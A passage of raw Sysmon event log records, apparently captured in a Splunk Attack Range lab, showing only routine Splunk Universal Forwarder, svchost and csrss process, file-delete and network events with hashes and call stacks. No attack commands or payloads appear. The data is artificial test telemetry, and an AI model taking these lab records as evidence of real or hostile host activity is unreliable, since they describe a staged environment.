Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000046248Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:28.989{FE4C2B44-E628-63C7-8006-00000000AF02}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000046247Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:28.043{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0940B585AEAA95DFAEADA69F9F22A928,SHA256=9A291E75F3D817714659096981E751250B03868BE5C8EB4CAAE545A3AE324C8E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018537Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.870{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E629-63C7-3602-00000000B002}1532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018536Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.870{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018535Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.870{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018534Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.870{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018533Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.870{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018532Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.870{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018531Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.870{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018530Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.870{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018529Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.870{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018528Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.870{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018527Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.870{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E629-63C7-3602-00000000B002}1532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018526Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.870{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E629-63C7-3602-00000000B002}1532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018525Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.870{E5A8D418-E629-63C7-3602-00000000B002}1532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018524Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.698{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D126071DD7F09FCFFFC3E2FCE1ED5324,SHA256=C0E9B378C8A17E01A939768A1BC4753D3D1CFC58AB4D7BBB84220E0FD2DEA4B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000018523Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:27.966{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50184-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000046266Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:29.763{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E629-63C7-8106-00000000AF02}7040C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046265Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:29.763{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046264Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:29.763{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046263Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:29.763{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046262Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:29.763{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046261Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:29.763{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E629-63C7-8106-00000000AF02}7040C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000046260Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:29.763{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E629-63C7-8106-00000000AF02}7040C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000046259Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:29.764{FE4C2B44-E629-63C7-8106-00000000AF02}7040C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000046258Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:29.663{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=773F13DC7F44D99B08968C676C4A62B5,SHA256=E38C10741207E05E987A81E84118ECF11F50D8207C6244B26678E04DFAB8A736,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000046257Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:27.231{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56460-false10.0.1.12-8089- 23542300x800000000000000046256Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:29.129{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB8F277591BA0A96D8953DC876BD2035,SHA256=E0EFDF0FC625BCC8673C0FAED8FF0B02033E82B2B313A214A71FE744FB3829FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018522Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:29.194{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E629-63C7-3502-00000000B002}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018521Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 